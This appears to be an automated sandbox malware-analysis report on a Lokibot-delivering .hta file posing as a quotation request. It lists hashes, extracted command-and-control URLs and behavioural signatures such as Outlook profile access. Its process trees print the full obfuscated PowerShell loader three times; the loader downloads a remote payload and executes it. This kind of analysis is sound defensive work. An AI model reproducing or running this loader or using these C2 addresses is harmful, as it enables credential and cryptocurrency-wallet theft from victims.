Overview

overview

10

Static

static

1

報價請�...17.hta

windows7-x64

10

報價請�...17.hta

windows10-2004-x64

8

Analysis

  • max time kernel
    292s
  • max time network
    286s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2024 12:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    報價請求 (國立臺灣大學) TW24-0917.hta

  • Size

    7KB

  • MD5

    6478016f557127bcb15e168eb8275c75

  • SHA1

    595e5d9cc7472660ec4e0c182a633014a43c974c

  • SHA256

    acc9d013bc7c54953fd61c5626bcb2378452656ab98a3ef7c9bdeb5b57455933

  • SHA512

    b5a9873d8c1ea36d7aae2e4974f233616221a316deb05ca5dd8b1c423f191c8cd8538f55d13f4d62cc4dab9347bd4b45d93f7dab5acf2d91f7041ceeb578ec46

  • SSDEEP

    96:bpYfMEPTs5q+PgNbvrQZwJrOX32pdF60+oKOnPFIi/fds1R7b8eEj+ErV3/53/yw:yVsiBvrQSNOWp1nh1y7bgq+VRPFih8Gc

Score
10/10
lokibotcollectiondiscoveryspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://168.100.10.152/index.php/wp.php?view=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 14 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\報價請求 (國立臺灣大學) TW24-0917.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:400
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2516
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:692

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZWBY8G7EM30SX0VT98F0.temp
    Filesize

    7KB

    MD5

    9857938230d887a0cae1e727813f0fb6

    SHA1

    bf21f496d6fef9c5a58840887eb9bb49135e4313

    SHA256

    a57b097f25d8caec79eb8666de2ee759fca825ff9590fb60fa8397bf584281a4

    SHA512

    595714cc58a7d0f152cc224c8c5a8d293f84dc3b8cf60fb4be59128c9d4c1cb388b16aafc47e377c0db1b05ff087294745dd7985214d5e2d4bfeb28d9a707f65

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    066933ee3da5e6e24ff964a870ca1246

    SHA1

    4e09145d82878a62f394a0bf19108bb16fd1a612

    SHA256

    55c1cddbaaf557a93b27a20ba7f594b728a64d4150bf7d4775e4b589a1b98c7b

    SHA512

    133759ea553427dd5032a45ff2dc7950f22abf62a0ad94e610fb29bb2765eaeb8f26ff32af237ffa567bf2c0fce7265e5a63d9f80a7e0535aa1229e793f0fe24

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Ulp.Blo
    Filesize

    472KB

    MD5

    183f1f76a0c8b3f31dc2cfea13cf9d18

    SHA1

    ebe5f2cea1f7735bf57a6b7ed72259b2d1e773af

    SHA256

    21a0922961a9c910c6d3763c41a17a6a687b7c6da22f8117e84c90c6b836553c

    SHA512

    a1bd075f13086a534f8dbeab8428e0d75ccbbf176cf321eb1aa1e0c1a61ac54ddc1f0351aaa91e787fa4fb4f24bb8e477f9655dfb9d48b8cdd92379200b5f3e7

    Download Submit

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • memory/692-44-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/1652-22-0x00000000068E0000-0x0000000008E40000-memory.dmp

    Filesize

    37.4MB

    Download

  • memory/2516-13-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2516-14-0x0000000001F00000-0x0000000001F08000-memory.dmp

